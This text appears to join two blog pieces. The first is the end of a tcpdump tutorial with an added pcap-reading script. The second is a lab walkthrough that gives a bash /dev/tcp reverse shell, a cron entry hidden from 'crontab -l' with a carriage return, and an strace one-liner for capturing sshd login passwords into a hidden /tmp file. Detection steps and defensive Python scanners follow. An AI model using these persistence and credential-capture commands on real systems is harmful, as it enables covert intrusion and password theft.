    13:36:58.022132 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [.], ack 644, win 239, options [nop,nop,TS val 135708371 ecr 526053025], length 0

    $

    Since you are no longer capturing packets directly from a network interface, sudo is not required to read the file (as long as its permissions allow it).
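    The .pcap format is simple enough that a capture file can be sanity-checked without tcpdump or Wireshark at hand. The reader below is an added example, not code from the original article or from libpcap: it parses the classic pcap global header (either byte order, microsecond or nanosecond timestamps), walks the packet records, and stops cleanly if the file was cut short, as happens when tcpdump is killed mid-write. The two-packet capture it builds is constructed for the demonstration, not real traffic; pcapng, which Wireshark writes by default, is out of scope.

```python
import struct

# Added example, not code from the original article: a minimal reader for the classic
# pcap format that `tcpdump -w` writes, so a capture file can be checked (link type,
# packet count, truncation) without tcpdump or Wireshark. Handles both byte orders and
# the nanosecond variant; pcapng, Wireshark's own default, is not covered.

LINKTYPE_LINUX_SLL = 113       # "link-type LINUX_SLL (Linux cooked)" in the output above
LINKTYPE_ETHERNET = 1

# Magic number as read little-endian -> (struct byte-order prefix, timestamp fraction divisor)
MAGICS = {
    0xA1B2C3D4: ("<", 1_000_000),      0xD4C3B2A1: (">", 1_000_000),       # microseconds
    0xA1B23C4D: ("<", 1_000_000_000),  0x4D3CB2A1: (">", 1_000_000_000),   # nanoseconds
}


def parse_pcap(data):
    """Return (link_type, snaplen, records); each record is (timestamp, original_len, bytes)."""
    if len(data) < 24:
        raise ValueError("truncated pcap global header")
    (magic,) = struct.unpack("<I", data[:4])
    if magic not in MAGICS:
        raise ValueError("not a classic pcap file (pcapng?): magic 0x%08x" % magic)
    bo, divisor = MAGICS[magic]
    _, _major, _minor, _tz, _sigfigs, snaplen, link_type = struct.unpack(bo + "IHHiIII", data[:24])
    records, off = [], 24
    while off + 16 <= len(data):
        ts_sec, ts_frac, caplen, orig_len = struct.unpack(bo + "IIII", data[off:off + 16])
        off += 16
        pkt = data[off:off + caplen]
        if len(pkt) < caplen:
            break                      # file cut short mid-packet, e.g. tcpdump killed while writing
        records.append((ts_sec + ts_frac / divisor, orig_len, pkt))
        off += caplen
    return link_type, snaplen, records


def build_sample_pcap(byte_order="<"):
    """Constructed two-packet capture (not real traffic) used for the demonstration."""
    header = struct.pack(byte_order + "IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 262144, LINKTYPE_LINUX_SLL)
    packets = [(1537722134, 871803, b"\x00\x04" + b"\x00" * 14 + b"\x45" + b"\x00" * 19),
               (1537722134, 910734, b"\x00\x00" + b"\x00" * 14 + b"\x45" + b"\x00" * 39)]
    body = b"".join(struct.pack(byte_order + "IIII", s, us, len(p), len(p)) + p for s, us, p in packets)
    return header + body


if __name__ == "__main__":
    link_type, snaplen, records = parse_pcap(build_sample_pcap())
    print("link type %d, snaplen %d, %d packets" % (link_type, snaplen, len(records)))
    for ts, orig_len, pkt in records:
        print("%.6f captured %d of %d bytes" % (ts, len(pkt), orig_len))
```

    To use it on a real file, read webserver.pcap in binary mode and pass the bytes to parse_pcap; a record whose captured length is smaller than its original length was cut by the snaplen, and a file that ends mid-record was not closed cleanly.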

    You can also apply any of the filters discussed above to the contents of the file, exactly as with live traffic. For example, inspect the packets in the capture file with source IP address 54.204.39.132 by running:

    $ tcpdump -nn -r webserver.pcap src 54.204.39.132

    reading from file webserver.pcap, link-type LINUX_SLL (Linux cooked)

    13:36:57.718932 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [S.], seq 1999298316, ack 3709732620, win 28960, options [mss 1460,sackOK,TS val 526052949 ecr 135708029,nop,wscale 9], length 0

    13:36:57.756979 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [.], ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 0

    13:36:57.760122 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 642: HTTP: HTTP/1.1 302 Found

    13:36:58.022089 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [F.], seq 643, ack 114, win 57, options [nop,nop,TS val 526053025 ecr 135708327], length 0

    What's next?

    These basic features of tcpdump will help you get started with this powerful and versatile tool. To learn more, consult the tcpdump website and man page.

    The tcpdump command-line interface provides great flexibility for capturing and analyzing network traffic. If you need a graphical tool to understand more complex flows, look at Wireshark.

    One benefit of Wireshark is that it can read .pcap files captured by tcpdump. You can use tcpdump to capture packets on a remote machine without a GUI and analyze the resulting file with Wireshark, but that is a topic for another day.

    Original article (English):

    https://opensource.com/article/18/10/introduction-tcpdump

    1 Preface

    A few days ago a friend sent me an article about hiding crontab entries. I learned something new, studied it a bit, and found it quite practical, so I wrote this up.

    2 Hiding a crontab entry

    2.1 Starting from one odd command

    The command below looks strange: we clearly wrote "abb\rocddde" into the file, yet plain cat only shows the part after the \r. Here echo -e enables interpretation of backslash escapes, so \r is a carriage return.

    root@ubuntu-lab:/home/miao# echo  -e "abb\rocddde"> b.txt 
    root@ubuntu-lab:/home/miao# cat b.txt 
    ocddde
    root@ubuntu-lab:/home/miao# cat -A b.txt
    abb^Mocddde$
    

    This is not cat mangling the output: cat writes the bytes out faithfully, but the terminal interprets the carriage return by moving the cursor back to the start of the line, so the characters that follow overwrite what was already displayed. The -A option makes every byte visible:

     -A, --show-all
                  equivalent to -vET
    
     -E, --show-ends
                  display $ at end of each line
     -v, --show-nonprinting
                  use ^ and M- notation, except for LFD and TAB
     -T, --show-tabs
                  display TAB characters as ^I
    

    With that understood, remember that crontab -l essentially cats the user's crontab file: on Debian/Ubuntu that is /var/spool/cron/crontabs/root (on Red Hat-family systems it is /var/spool/cron/root).

    2.2 Hiding the crontab entry

    The test script involves a reverse shell, so test that first. Open a listening port (attacker side):

    root@ubuntu-lab:/home/miao# nc -lnvp 1111
    Listening on 0.0.0.0 1111
    

    The victim side connects back:

    root@ubuntu-lab:/home/miao# bash -i &> /dev/tcp/127.0.0.1/1111 0>&1
    

    For an explanation of the reverse shell see: https://www.jianshu.com/p/41fffb0654a7. In short, bash's stdin, stdout and stderr are all redirected onto the TCP connection.

    That was a one-shot run. If port 1111 on the attacker side is not open, a connection error is reported:

    root@ubuntu-lab:/home/miao# bash -i &> /dev/tcp/127.0.0.1/1111 0>&1
    bash: connect: Connection refused
    bash: /dev/tcp/127.0.0.1/1111: Connection refused
    

    So how do we make the victim keep connecting back until our port is open? Obviously with crontab.

    First version:

    root@ubuntu-lab:/home/miao# echo  "*/1 * * * * bash -i &> /dev/tcp/127.0.0.1/1111 0>&1 " >/var/spool/cron/crontabs/root
    root@ubuntu-lab:/home/miao# crontab -l
    */1 * * * * bash -c "bash -i &> /dev/tcp/127.0.0.1/1111 0>&1 "
    

    Obviously this hides nothing. Hiding it is simple, just add a carriage return, but it is not enough for the entry merely not to show: we want the output of crontab -l to look exactly like that of a user with no crontab at all.

    A crontab written this way is awkward to test, so the command can also go into a separate shell script:

    root@ubuntu-lab:/home/miao# crontab -l
    */1 * * * * sh /home/miao/1.sh
    
    root@ubuntu-lab:/home/miao# cat 1.sh
    #!/bin/bash
    echo `date` >/home/miao/122
    echo $? >>/home/miao/122
    bash -c "bash -i &> /dev/tcp/127.0.0.1/1111 0>&1 "
    

    The result:

    root@ubuntu-lab:/home/miao# nc -lnvp 1111
    Listening on 0.0.0.0 1111
    Connection received on 127.0.0.1 57768
    bash: cannot set terminal process group (8552): Inappropriate ioctl for device
    bash: no job control in this shell
    root@ubuntu-lab:~# 
    root@ubuntu-lab:~# pwd
    pwd
    /root
    root@ubuntu-lab:~# cd /home/miao
    cd /home/miao
    root@ubuntu-lab:/home/miao# pwd
    pwd
    /home/miao
    

    The hiding command in practice:

    root@ubuntu-lab:/home/miao# crontab -l
    no crontab for root
    root@ubuntu-lab:/home/miao# (crontab -l;printf "* * * * * /home/miao/1.sh;\rno crontab for `whoami`%100c\n")|crontab -
    no crontab for root
    root@ubuntu-lab:/home/miao# cat /var/spool/cron/crontabs/root
    # DO NOT EDIT THIS FILE - edit the master and reinstall.
    # (- installed on Sun Jul 24 05:28:19 2022)
    # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
    no crontab for root                                                                                                   
    root@ubuntu-lab:/home/miao# cat -A /var/spool/cron/crontabs/root
    # DO NOT EDIT THIS FILE - edit the master and reinstall.$
    # (- installed on Sun Jul 24 05:28:19 2022)$
    # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)$
    * * * * * /home/miaohq/1.sh;^Mno crontab for root  
    

    Note the "%100c\n": %100c prints a field padded to 100 spaces, so that the text after the carriage return is at least as long as the real entry in front of it and overwrites all of it; the \n mimics the newline that crontab -l prints. Without the padding, the text after \r only overwrites the beginning of the line and the tail of the real entry stays visible:

    root@ubuntu-lab:/home/miao# printf  "* * * * * /home/miao/1.sh;\rno crontab for `whoami` \n"
    no crontab for root /1.sh;
    

    That's it.

    2.3 Detection

    Detection is straightforward: first use netstat to find the process behind the connection, then follow the process tree to see what started it:

    root@ubuntu-lab:/home/miao# netstat -antp|grep 1111
    tcp        1      0 0.0.0.0:1111            0.0.0.0:*               LISTEN      1786/nc             
    tcp        0      0 127.0.0.1:57386         127.0.0.1:1111          ESTABLISHED 1803/bash           
    tcp        0      0 127.0.0.1:57390         127.0.0.1:1111          ESTABLISHED 1870/bash           
    tcp        0      0 127.0.0.1:1111          127.0.0.1:57386         ESTABLISHED 1786/nc             
    tcp      133      0 127.0.0.1:1111          127.0.0.1:57390         ESTABLISHED -   
    
    root@ubuntu-lab:/home/miao# pstree -p|grep 1803
               |-cron(1013)-+-cron(1798)---sh(1799)---1.sh(1800)---bash(1802)---bash(1803)
    root@ubuntu-lab:/home/miao# 
    root@ubuntu-lab:/home/miao# 
    root@ubuntu-lab:/home/miao# ps -ef|grep 1013
    root        1013       1  0 05:48 ?        00:00:00 /usr/sbin/cron -f -P
    root        1798    1013  0 05:51 ?        00:00:00 /usr/sbin/CRON -f -P
    root        1865    1013  0 05:52 ?        00:00:00 /usr/sbin/CRON -f -P
    root        1913    1013  0 05:53 ?        00:00:00 /usr/sbin/CRON -f -P
    root        1962    1817  0 05:53 pts/0    00:00:00 grep --color=auto 1013
    root@ubuntu-lab:/home/miao# ps -ef|grep 1798
    root        1798    1013  0 05:51 ?        00:00:00 /usr/sbin/CRON -f -P
    root        1799    1798  0 05:51 ?        00:00:00 /bin/sh -c /home/miao/1.sh;?no crontab for root                                                                                                   
    root        1973    1817  0 05:54 pts/0    00:00:00 grep --color=auto 1798
    

    Simple enough: we can see that CRON started the shell script: /bin/sh -c /home/miao/1.sh;?no crontab for root (ps prints the carriage return as ?). The same trick is caught directly by looking at the file rather than at the terminal: crontab -l | cat -A, or cat -A on the spool file, shows the ^M, and a file-integrity or audit watch on the crontab spool directory catches the write itself.
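    To make both the trick in 2.2 and the detection in 2.3 concrete, here is an added Python example that is not part of the original post: it simulates what a terminal shows for a line containing a carriage return (reproducing the "no crontab for root /1.sh;" output above), renders control bytes in caret notation the way cat -A does, and scans crontab files for such entries. The spool paths in DEFAULT_PATHS are the usual Debian/Ubuntu and RHEL locations and are an assumption; the sample lines are constructed from the post's printf.

```python
import re

# Added example, not code from the original post: simulate what a terminal displays
# for a crontab line that contains a carriage return, make the hidden bytes visible
# the way `cat -A` does, and scan crontab files for such entries. The spool paths
# in DEFAULT_PATHS are the usual Debian/Ubuntu and RHEL locations (an assumption).

# Every control byte except tab and newline; \r (0x0d) is the one used by the trick above.
CONTROL_BYTES = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")


def render_as_terminal(line):
    """\\r moves the cursor to column 0 and later characters overwrite what was printed."""
    buf, col = [], 0
    for ch in line.rstrip("\n"):
        if ch == "\r":
            col = 0
            continue
        if col < len(buf):
            buf[col] = ch
        else:
            buf.append(ch)
        col += 1
    return "".join(buf)


def make_visible(line):
    """Show control bytes in caret notation like `cat -v`: \\r becomes ^M, DEL becomes ^?."""
    return CONTROL_BYTES.sub(lambda m: "^" + chr(ord(m.group()) ^ 0x40), line)


def hidden_entries(text):
    """Lines containing control bytes, as (line_no, cat -v view, what a terminal shows)."""
    hits = []
    for n, raw in enumerate(text.split("\n"), 1):   # not splitlines(): that splits on \r too
        if CONTROL_BYTES.search(raw):
            hits.append((n, make_visible(raw), render_as_terminal(raw)))
    return hits


def scan_crontab_files(paths):
    """Return {path: hits} for every readable file in paths that has a suspicious line."""
    findings = {}
    for p in paths:
        try:
            with open(p, "rb") as f:          # binary: no newline translation of \r
                text = f.read().decode("latin-1")
        except OSError:
            continue
        hits = hidden_entries(text)
        if hits:
            findings[p] = hits
    return findings


# Constructed samples mirroring the post's printf: with and without the %100c padding.
SAMPLE_UNPADDED = "* * * * * /home/miao/1.sh;\rno crontab for root \n"
SAMPLE_PADDED = "* * * * * /home/miao/1.sh;\rno crontab for root" + " " * 100 + "\n"

DEFAULT_PATHS = ["/var/spool/cron/crontabs/root",   # Debian/Ubuntu (assumed)
                 "/var/spool/cron/root",            # RHEL/CentOS (assumed)
                 "/etc/crontab"]

if __name__ == "__main__":
    for sample in (SAMPLE_UNPADDED, SAMPLE_PADDED):
        for n, visible, shown in hidden_entries(sample):
            print("terminal shows: %r\nfile contains:  %s" % (shown, visible))
    for path, hits in scan_crontab_files(DEFAULT_PATHS).items():
        for n, visible, _ in hits:
            print("%s:%d: %s" % (path, n, visible))
```

    Run it as root to cover the spool files; extend DEFAULT_PATHS with the other crontab files on your system (for example everything under /etc/cron.d), since the same carriage-return trick works in any of them.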

    3 Capturing login passwords with strace

    The principle is simple: strace can trace an application's system calls and see their arguments, so by tracing the sshd login process the password can be captured. The script is short:

     # -f follows the forked per-connection sshd children; -s 32 limits how much of each string is printed
     (strace -f -F -p `ps aux|grep "/usr/sbin/sshd"|grep -v grep|awk {'print $2'}`  -e trace=read,write -s 32 2> /tmp/.ssh &)
    

    If this fails with a permission error, set kernel.yama.ptrace_scope to 0 in /etc/sysctl.d/10-ptrace.conf and apply it. Note that a bare sysctl -p reads only /etc/sysctl.conf, so either pass the file name or reload everything:

     /etc/sysctl.d/10-ptrace.conf
     set: kernel.yama.ptrace_scope = 0
     then run: sysctl -p /etc/sysctl.d/10-ptrace.conf   (or sysctl --system)
    
    

    Then search the trace output (the file the strace command above writes to); fd 6 and the \0\0\0 length-prefix pattern are specific to the author's sshd and may need adjusting:

    grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.ssh
    

    This recovers the password. On the defending side, a tracer attached to sshd is visible as a non-zero TracerPid in /proc/<pid>/status, ptrace calls can be logged with an audit rule on the ptrace syscall, and a hidden trace file under /tmp holding credentials is itself an indicator worth hunting for.
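    On the defending side, a tracer attached to sshd is visible in /proc. The following Python is an added example, not part of the original post: it reports every process whose TracerPid field in /proc/<pid>/status is non-zero, which is the footprint the strace command above leaves on sshd. The status excerpt used as sample input is constructed.

```python
import os
import re

# Added example, not code from the original post: list processes that currently have
# a ptrace tracer attached, which is exactly the footprint the strace command above
# leaves on sshd. TracerPid in /proc/<pid>/status is 0 when nobody is attached.


def tracer_pid(status_text):
    """TracerPid value from the text of /proc/<pid>/status, or None if the field is missing."""
    m = re.search(r"^TracerPid:\s*(\d+)", status_text, re.M)
    return int(m.group(1)) if m else None


def process_name(status_text):
    """Name field of /proc/<pid>/status (the command name, truncated by the kernel to 15 chars)."""
    m = re.search(r"^Name:\s*(.+)$", status_text, re.M)
    return m.group(1).strip() if m else "?"


def traced_processes(proc="/proc"):
    """[(pid, name, tracer_pid)] for every process whose TracerPid is non-zero."""
    found = []
    if not os.path.isdir(proc):
        return found
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "status")) as f:
                text = f.read()
        except OSError:
            continue            # process exited meanwhile, or not readable
        tracer = tracer_pid(text)
        if tracer:
            found.append((int(entry), process_name(text), tracer))
    return found


# Constructed excerpt of /proc/<pid>/status for an sshd being traced by pid 4711.
SAMPLE_STATUS = (
    "Name:\tsshd\nUmask:\t0022\nState:\tt (tracing stop)\n"
    "Tgid:\t812\nNgid:\t0\nPid:\t812\nPPid:\t1\nTracerPid:\t4711\n"
)

if __name__ == "__main__":
    for pid, name, tracer in traced_processes():
        print("pid %d (%s) is being traced by pid %d" % (pid, name, tracer))
```

    Run it as root so every status file is readable; a non-zero TracerPid on sshd, a database, or any process handling credentials deserves a look at what the tracer pid is and who started it.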
